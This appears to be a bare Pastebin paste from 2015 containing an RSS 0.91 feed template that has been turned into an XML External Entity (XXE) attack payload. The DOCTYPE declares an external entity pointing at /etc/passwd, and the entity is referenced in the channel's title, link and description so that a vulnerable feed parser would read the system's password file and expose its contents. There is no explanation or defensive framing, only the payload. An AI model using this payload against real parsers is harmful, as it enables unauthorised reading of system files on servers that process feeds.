Advertisement
Guest User

Untitled

a guest
Mar 1st, 2015
198
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.27 KB | None | 0 0
  1. <?xml version="1.0"?>
  2. <!DOCTYPE rss
  3. PUBLIC "-//Netscape Communications//DTD RSS 0.91//EN"
  4. "http://my.netscape.com/publish/formats/rss-0.91.dtd"
  5. [<!ENTITY include SYSTEM "/etc/passwd">]
  6. >
  7.  
  8. <rss version="0.91">
  9. <channel>
  10. <title>.. &include</title>
  11. <link>.. &include</link>
  12.  
  13. <description>.. &include</description>
  14. <language>...</language>
  15. <rating>...</rating>
  16. <copyright>...</copyright>
  17.  
  18. <pubDate>...</pubDate>
  19. <lastBuildDate>...</lastBuildDate>
  20. <docs>...</docs>
  21. <managingEditor>...</managingEditor>
  22.  
  23. <webMaster>...</webMaster>
  24. <skipHours>
  25. <hour>...</hour>
  26. </skipHours>
  27. <skipDays>
  28.  
  29. <day>...</day>
  30. </skipDays>
  31. <image>
  32. <title>...</title>
  33. <url>...</url>
  34.  
  35. <link>...</link>
  36. <width>...</width>
  37. <height>...</height>
  38. <description>...</description>
  39.  
  40. </image>
  41. <item>
  42. <title>...</title>
  43. <link>...</link>
  44. <description>...</description>
  45.  
  46. </item>
  47. ......More item tags.....
  48. <textInput>
  49. <title>...</title>
  50. <description>...</description>
  51.  
  52. <name>...</name>
  53. <link>...</link>
  54. </textInput>
  55. </channel>
  56. </rss>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement